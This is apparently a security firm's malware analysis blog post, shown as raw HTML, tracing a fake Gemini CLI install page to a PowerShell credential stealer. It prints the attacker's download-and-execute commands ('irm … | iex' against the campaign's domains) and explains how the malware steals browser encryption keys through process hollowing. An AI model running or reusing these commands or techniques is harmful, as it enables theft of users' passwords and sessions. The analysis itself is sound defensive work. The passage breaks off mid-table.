href=\"https:\/\/cirosec.de\/en\/inquiry\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Send enquiry<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t<div class=\"elementor-element elementor-element-9865c47 e-flex e-con-boxed e-con e-parent\" data-id=\"9865c47\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4efe62d elementor-widget elementor-widget-html\" data-id=\"4efe62d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<script>\n\ndocument.addEventListener('DOMContentLoaded', function() {\njQuery(function($) {\nvar mywindow = $(window);\nvar mypos = mywindow.scrollTop();\nlet scrolling = false;\nwindow.addEventListener('scroll', function() {\nscrolling = true;\n});\nsetInterval(() => {\nif (scrolling) {\nscrolling = false;\nif (mypos > 40) {\nif (mywindow.scrollTop() > mypos) {\n$('#header--sticky').addClass('headerup');\n} else {\n$('#header--sticky').removeClass('headerup');\n}\n}\nmypos = mywindow.scrollTop();\n}\n}, 300);\n});\n});\n\n<\/script>\n<style>\n#header--sticky{\ntransition : transform 0.34s ease;\n}\n.headerup{\ntransform: translateY(-110px); \/*adjust this value to the height of your header*\/\n}\n<\/style>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/header>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-68da7c3e elementor-reverse-mobile elementor-section-height-min-height elementor-section-items-stretch elementor-section-boxed elementor-section-height-default\" data-id=\"68da7c3e\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-55711613\" data-id=\"55711613\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2cb35397 elementor-widget elementor-widget-post-info\" data-id=\"2cb35397\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"post-info.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<ul class=\"elementor-inline-items elementor-icon-list-items elementor-post-info\">\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item elementor-repeater-item-59da575 elementor-inline-item\" itemprop=\"about\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text elementor-post-info__item elementor-post-info__item--type-terms\">\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-post-info__terms-list\">\n\t\t\t\t<span class=\"elementor-post-info__terms-list-item\">Forensic<\/span>\t\t\t\t<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-14d31a0f elementor-widget elementor-widget-heading\" data-id=\"14d31a0f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Analysis of a credential stealer malware campaign \u2013 Part II<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3c77d9b2 elementor-widget elementor-widget-spacer\" data-id=\"3c77d9b2\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-515a3313 elementor-widget elementor-widget-text-editor\" data-id=\"515a3313\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>June 23, 2026<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-8c0b6ae elementor-hidden-mobile_extra elementor-hidden-mobile\" data-id=\"8c0b6ae\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e2a71ee elementor-widget elementor-widget-spacer\" data-id=\"e2a71ee\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-59f9b77b elementor-reverse-mobile elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"59f9b77b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-6590b57a\" data-id=\"6590b57a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-46ada19a elementor-widget elementor-widget-menu-anchor\" data-id=\"46ada19a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-menu-anchor\" id=\"section1\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5c9d3e0d elementor-widget elementor-widget-heading\" data-id=\"5c9d3e0d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Analysis of a credential stealer malware campaign \u2013 Part II<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-d236dd6 elementor-widget elementor-widget-text-editor\" data-id=\"d236dd6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Introduction<\/h2><p>In this second part of our series, we continue our investigation into a malware campaign that targets users by impersonating well-known software websites. As we tracked the campaign, we observed the malware evolving and becoming more complex. The current version differs from the one discussed in part 1 by introducing more powerful functions: the malware uses a local webserver that acts as a direct command-execution backdoor and a custom-deployed chrome browser extension designed for sophisticated credential theft.<\/p><p>As the current version shares features and functionalities explained in part one of this series, we recommend reading <a href=\"https:\/\/cirosec.de\/en\/news\/analysis-of-a-credential-stealer-malware-campaign-part-1\/\" target=\"_blank\" rel=\"noopener\">part one<\/a> first.<\/p><h2>Infection<\/h2><p>The attack path has not changed, as the attackers still use *[.]co[.]com domains to lure Bing users onto their website impersonating a well-known product, in this case \u201cGemini CLI\u201d:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5af6a421 elementor-widget elementor-widget-image\" data-id=\"5af6a421\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild1.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild1\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2ODIsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDEucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img decoding=\"async\" width=\"640\" height=\"627\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27682 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild1.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild1.png 683w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild1-300x294.png 300w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 1: Bing results with a malicious [.]co[.]com domain on top<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-12326d1d\" data-id=\"12326d1d\" data-element_type=\"column\" data-e-type=\"column\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-30013f94 elementor-widget elementor-widget-image-box\" data-id=\"30013f94\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><div class=\"elementor-image-box-title\">Colin Gl\u00e4tzer, Konrad Weyhing<\/div><p class=\"elementor-image-box-description\">Consultants<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-6ad886bf elementor-widget elementor-widget-heading\" data-id=\"6ad886bf\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Category<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3004a80c elementor-widget elementor-widget-post-info\" data-id=\"3004a80c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"post-info.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items elementor-post-info\">\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item elementor-repeater-item-59da575\" itemprop=\"about\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text elementor-post-info__item elementor-post-info__item--type-terms\">\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-post-info__terms-list\">\n\t\t\t\t<span class=\"elementor-post-info__terms-list-item\">Forensic<\/span>\t\t\t\t<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-6c4f43db elementor-widget elementor-widget-heading\" data-id=\"6c4f43db\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Date<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-28dd0c9e elementor-widget elementor-widget-post-info\" data-id=\"28dd0c9e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"post-info.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items elementor-post-info\">\n\t\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item elementor-repeater-item-59da575\" itemprop=\"datePublished\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text elementor-post-info__item elementor-post-info__item--type-date\">\n\t\t\t\t\t\t\t\t\t\t<time>2026-06-23<\/time>\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-357f46a7 elementor-widget elementor-widget-heading\" data-id=\"357f46a7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-heading-title elementor-size-default\">Navigation<\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-9d496b elementor-widget elementor-widget-table-of-contents\" data-id=\"9d496b\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;],&quot;exclude_headings_by_selector&quot;:[],&quot;marker_view&quot;:&quot;bullets&quot;,&quot;icon&quot;:{&quot;value&quot;:&quot;fas fa-chevron-right&quot;,&quot;library&quot;:&quot;fa-solid&quot;},&quot;no_headings_message&quot;:&quot;No headings were found on this page.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet_extra&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile_extra&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div id=\"elementor-toc__9d496b\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<i class=\"elementor-toc__spinner eicon-animation-spin eicon-loading\" aria-hidden=\"true\"><\/i>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-589e0a01 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"589e0a01\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-73ee4f8f\" data-id=\"73ee4f8f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-1615bb91 elementor-widget elementor-widget-menu-anchor\" data-id=\"1615bb91\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-menu-anchor\" id=\"info-event\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3190364b elementor-widget elementor-widget-menu-anchor\" data-id=\"3190364b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-menu-anchor\" id=\"section2\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-716a48e8 elementor-widget elementor-widget-text-editor\" data-id=\"716a48e8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>After clicking the malicious Bing result, the user is redirected to the domain use-gemini[.]com, which impersonates Google\u2019s Gemini-CLI page. If the user uses the displayed command to install the cli instead of the legitimate PowerShell command, a infostealer is installed.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5ca94b7a elementor-widget elementor-widget-menu-anchor\" data-id=\"5ca94b7a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-menu-anchor\" id=\"section3\"><\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5b45d436 elementor-widget elementor-widget-image\" data-id=\"5b45d436\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild2.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild2\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2ODQsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDIucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img decoding=\"async\" width=\"640\" height=\"217\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27684 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild2-768x260.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild2-768x260.png 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild2-300x101.png 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild2-1024x346.png 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild2-1536x519.png 1536w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild2.png 1745w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 2: Legitimate (left) vs malicious (right) download page<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4c11d7b elementor-widget elementor-widget-text-editor\" data-id=\"4c11d7b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Analogous to the case described in part one, the impersonating domain is only accessible when a Bing referrer header is set. Furthermore, the malicious command is only shown to users with a Windows user-agent, any other user-agent will result in the legitimate npm install&#8230; command being shown. The contacted \/install.ps1 endpoint checks the user-agent <em>again<\/em>, this time to see whether the request is originating from \u201cWindowsPowershell\u201d, and returns the following code snippet if the check is successful:<\/p><table><tbody><tr><td width=\"612\"><pre>$GeminiObj = New-Object -ComObject \u201cShell.Application\u201d;<br \/><br \/>$GeminiObj.ShellExecute(\u201cpowershell\u201d, \u2018\u201dirm events.msft23.com | iex\u201d\u2019, $null, \u201copen\u201d, 0);<br \/>npm install -g @google\/gemini-cli<\/pre><\/td><\/tr><\/tbody><\/table><p>If the check fails, the user <em>again<\/em> will only receive the command to install the npm package, as can be seen in the figure below:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-2da27a3f elementor-widget elementor-widget-image\" data-id=\"2da27a3f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild3.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild3\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2ODYsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDMucG5nIn0%3D\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"220\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27686 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild3.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild3.png 755w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild3-300x103.png 300w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 3: Different user agents result in different commands being returned<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1ffbefcc elementor-widget elementor-widget-text-editor\" data-id=\"1ffbefcc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>If every check passes, the user downloads a short PowerShell snippet from the same server we observed in part one (here: events[.]msft23[.]com, hosted on the same IP-address as ms709[.]com previously). The commands retrieved from \u201cirm events.msft23.com\u201d download two more PowerShell scripts and execute them automatically via iex:<\/p><table><tbody><tr><td width=\"604\"><pre>irm mo2307[.]com | iex<br \/><br \/>irm events[.]msft23[.]com\/1 | iex<\/pre><\/td><\/tr><\/tbody><\/table><p>The process thus far is completely analog to the analysis in part one. The two commands detailed above act as the next stage of the infection chain. Just as previously observed, events[.]msft23[.]com\/1 delivers an information stealer; since this is the same variant already covered, it will not be the focus of this second part.<\/p><p>However, the download served from mo2307[.]com deploys a completely new PowerShell script that differs significantly in behavior from what we have seen previously and runs <em>alongside<\/em> the credential stealer. The following flow charts provides a complete overview of the malware\u2019s structure and its functionalities, starting with the infection.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-634f200f elementor-widget elementor-widget-image\" data-id=\"634f200f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t<figure class=\"wp-caption\">\n\t\t\t\t\t\t\t\t\t\t\t<a href=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild4-scaled.png\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-title=\"Part2_Bild4\" data-e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6Mjc2ODgsInVybCI6Imh0dHBzOlwvXC9jaXJvc2VjLmRlXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDI2XC8wNlwvUGFydDJfQmlsZDQtc2NhbGVkLnBuZyJ9\">\n\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"559\" src=\"data:image\/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==\" class=\"attachment-medium_large size-medium_large wp-image-27688 lazyload\" alt=\"\" sizes=\"(max-width: 640px) 100vw, 640px\" data-src=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild4-768x671.png\" data-srcset=\"https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild4-768x671.png 768w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild4-300x262.png 300w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild4-1024x894.png 1024w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild4-1536x1341.png 1536w, https:\/\/cirosec.de\/wp-content\/uploads\/2026\/06\/Part2_Bild4-2048x1788.png 2048w\">\t\t\t\t\t\t\t\t<\/a>\n\t\t\t\t\t\t\t\t\t\t\t<figcaption class=\"widget-image-caption wp-caption-text\">Figure 4: Flow chart of infection process and the malware\u2019s functionalities<\/figcaption>\n\t\t\t\t\t\t\t\t\t\t<\/figure>\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4759148e elementor-widget elementor-widget-text-editor\" data-id=\"4759148e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Initial C2 communication and browser extension installation<\/h2><p>The new script starts similar to the script that we already analyzed in the first blog post. It first checks if it is running in an excluded geography, then continues fingerprinting the system (whoami \/user, MachineGUID) and exfiltrating browser data to the \/init endpoint. Targeted browsers are the chromium-based instances of Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Perplexity, Helium and Arc.<\/p><p>For Chrome, Brave, and Edge (Chromium v20+ with App-Bound Encryption), the script targets the app_bound_encrypted_key\u00a0field inside the Local State JSON file. As this key is bound to the specific browser process, it cannot be decrypted by standard DPAPI calls alone. The malware resolves this by injecting a decryption stub into a legitimate browser process via Process Hollowing and retrieving the plaintext through a named pipe.<\/p><p>As in the original script, one global data stream exists where binary data is stored, compressed and uploaded once a certain size is reached. The decrypted 32-byte key is stored in this compressed data stream as &lt;BrowserName&gt;\/v20key.bin.<\/p><p>For Opera, OperaGX, Vivaldi, and other derivatives\u00a0(Chromium v10 DPAPI), the script extracts the encrypted_key from Local State, strips the leading DPAPI prefix (5 bytes), and decrypts it via Security.Cryptography.ProtectedData::Unprotect within the CurrentUser scope. The resulting key is added to the compressed datastream as &lt;BrowserName&gt;\/v10key.bin.<\/p><p>For every profile directory in each browser\u2019s User Data path, the script also copies the files Secure Preferences and Preferences alongside the full path to the ZIP archive.<\/p><p>The possession of the app-bound encryption key grants the attacker the ability to (offline) decrypt passwords, session cookies, autofill records and payment data that were stored in the user\u2019s browser.<\/p><p>The compressed data stream is then sent to the \/gate\/init\/version\/&lt;GUID&gt; endpoint via Invoke-WebRequest. Interestingly, the script uses iso-8859-1 to encode the binary data.<\/p><p>The server\u2019s response bytes are read back through the same iso-8859-1 enconding and loaded into a fresh memory stream for decompression, which results in the following three files:<\/p><table><tbody><tr><td width=\"302\"><strong>File<\/strong><\/td><td width=\"302\"><strong>Functionality<\/strong><\/td><\/tr><tr><td width=\"302\">extension.zip<\/td><td width=\"302\">Malicious browser 